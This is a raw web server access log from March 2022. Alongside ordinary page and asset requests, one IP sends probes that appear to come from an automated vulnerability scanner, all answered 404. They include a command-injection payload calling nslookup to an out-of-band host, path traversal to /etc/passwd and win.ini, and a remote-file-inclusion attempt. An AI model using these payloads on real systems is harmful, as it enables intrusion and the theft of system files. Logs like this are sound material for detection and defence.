42.236.17.196 - - [15/Mar/2022:05:20:40 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
42.236.17.196 - - [15/Mar/2022:05:20:41 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
42.236.17.196 - - [15/Mar/2022:05:20:41 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
42.236.17.196 - - [15/Mar/2022:05:20:41 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
42.236.17.196 - - [15/Mar/2022:05:20:41 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
42.236.17.196 - - [15/Mar/2022:05:20:41 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
42.236.17.196 - - [15/Mar/2022:05:20:41 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
42.236.17.196 - - [15/Mar/2022:05:20:41 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
181.215.176.138 - - [15/Mar/2022:05:21:28 -0500] "GET /webadmin/script?command=|%20nslookup%20c8o1scubpsncigj6avd0ceagejyyrx48a.oast.site HTTP/1.1" 404 1022
201.245.192.253 - - [15/Mar/2022:05:20:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45627
181.215.176.138 - - [15/Mar/2022:05:21:38 -0500] "GET /osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1022
181.215.176.138 - - [15/Mar/2022:05:21:39 -0500] "GET /adm/krgourl.php?DOCUMENT_ROOT=http://c8o1scubpsncigj6avd0ceagecyyrx65s.oast.site HTTP/1.1" 404 1022
181.215.176.138 - - [15/Mar/2022:05:21:53 -0500] "GET /_fragment?_path=_controller=phpcredits&flag=-1 HTTP/1.1" 404 1022
181.215.176.138 - - [15/Mar/2022:05:22:09 -0500] "GET /+CSCOE+/session_password.html HTTP/1.1" 404 1022
27.115.124.101 - - [15/Mar/2022:05:22:15 -0500] "GET /catalogoisis HTTP/1.1" 404 1140
201.245.192.253 - - [15/Mar/2022:05:21:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46103
181.215.176.138 - - [15/Mar/2022:05:22:24 -0500] "GET /fpui/jsp/index.jsp HTTP/1.1" 404 1022
201.245.192.253 - - [15/Mar/2022:05:21:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 117060
180.163.220.68 - - [15/Mar/2022:05:22:27 -0500] "GET /catalogoisis HTTP/1.1" 404 1140
216.245.221.92 - - [15/Mar/2022:05:22:34 -0500] "HEAD / HTTP/1.1" 200 -
181.215.176.138 - - [15/Mar/2022:05:22:45 -0500] "GET /dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null HTTP/1.1" 404 1022
181.215.176.138 - - [15/Mar/2022:05:23:04 -0500] "GET /index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1022
181.215.176.138 - - [15/Mar/2022:05:23:10 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1022
